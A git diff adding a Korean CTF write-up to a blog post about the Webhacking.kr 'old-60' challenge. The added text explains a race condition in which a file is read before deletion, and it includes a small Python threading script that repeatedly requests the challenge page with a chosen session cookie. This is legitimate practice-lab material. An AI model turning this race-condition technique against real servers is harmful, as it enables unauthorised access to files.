--- a/_posts/2024-11-01-old-60.md
+++ b/_posts/2024-11-01-old-60.md
@@ -1,8 +1,8 @@
 ---
-title: ["[Webhacking.kr] old-60 ( - 30)"]
+title: ["[Webhacking.kr] old-60 (race condition - 30)"]
 date: 2024-11-01 09:00:00 +0900
 categories: [writeup, webhacking.kr]
-tags: [web, ]
+tags: [web, race condition]
 ---
 
 ```php
@@ -32,3 +32,49 @@ tags: [web, ]
   }
 ?>
 ```
+
+먼저, `PHPSESSID`를 숫자로 바꿔 `Access Denied`에러가 뜨는 것을 해결한다.
+`./readme/idx.txt`에 접근을 하면 되는데, 로컬 호스트가 아니라면 1초뒤에 파일이 삭제된다.  
+
+즉, race condition을 이용하여 파일이 삭제되기 전에 접근하면 되겠다.  
+
+```python
+import requests
+import threading
+import time
+
+def create_file(url, cookies):
+    count = 0
+    while True:
+        try:
+            r = requests.get(url, cookies=cookies)
+            count += 1
+            print(f"[+] Create file attempt #{count}")
+            time.sleep(0.1) 
+        except Exception as e:
+            print(f"[-] Error in create_file: {e}")
+
+def main():
+    url = "https://webhacking.kr/challenge/web-37/" 
+    cookies = {
+        "PHPSESSID": "180100"  
+    }
+    
+    creator = threading.Thread(target=create_file, args=(url, cookies))
+    creator.daemon = True
+    creator.start()
+
+    try:
+        while True:
+            time.sleep(1)
+    except KeyboardInterrupt:
+        print("\n[!] Stopping exploit")
+
+if __name__ == "__main__":
+    main()
+```
+
+python requests 모듈을 사용해서 파일을 계속 생성하고,  
+브라우저에서 `?mode=auth`로 파일을 읽어오자.  
+
+이때 세션이 서로 달라야 하므로, `PHPSESSID`를 다른 숫자로 써야 한다.  
